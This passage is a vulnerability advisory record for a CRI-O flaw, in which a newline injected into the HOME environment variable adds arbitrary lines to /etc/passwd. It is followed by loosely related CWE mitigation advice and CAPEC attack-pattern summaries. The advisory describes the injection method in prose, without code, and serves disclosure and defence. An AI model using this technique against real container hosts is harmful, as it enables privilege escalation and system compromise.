"github_reviewed_at": null,
"nvd_published_at": "2026-07-15T13:17:03Z",
"severity": "HIGH"
},
"details": "A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.",
"id": "GHSA-9gq4-2485-q63q",
"modified": "2026-07-15T15:33:03Z",
"published": "2026-07-15T15:33:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15809"
},
{
"type": "WEB",
"url": "https://github.com/cri-o/cri-o/pull/6450"
},
{
"type": "WEB",
"url": "https://github.com/cri-o/cri-o/pull/6524"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-15809"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/cve-2022-4318"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500846"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-4.3
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
- Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability.
Mitigation MIT-27
Strategy: Parameterization
- If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
- For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection.
Mitigation
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
Mitigation
In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input.
Mitigation
Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20).
Mitigation
Fully specify which encodings are required by components that will be communicating with each other.
Mitigation
When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.
CAPEC-104: Cross Zone Scripting
An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.
CAPEC-73: User-Controlled Filename
An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.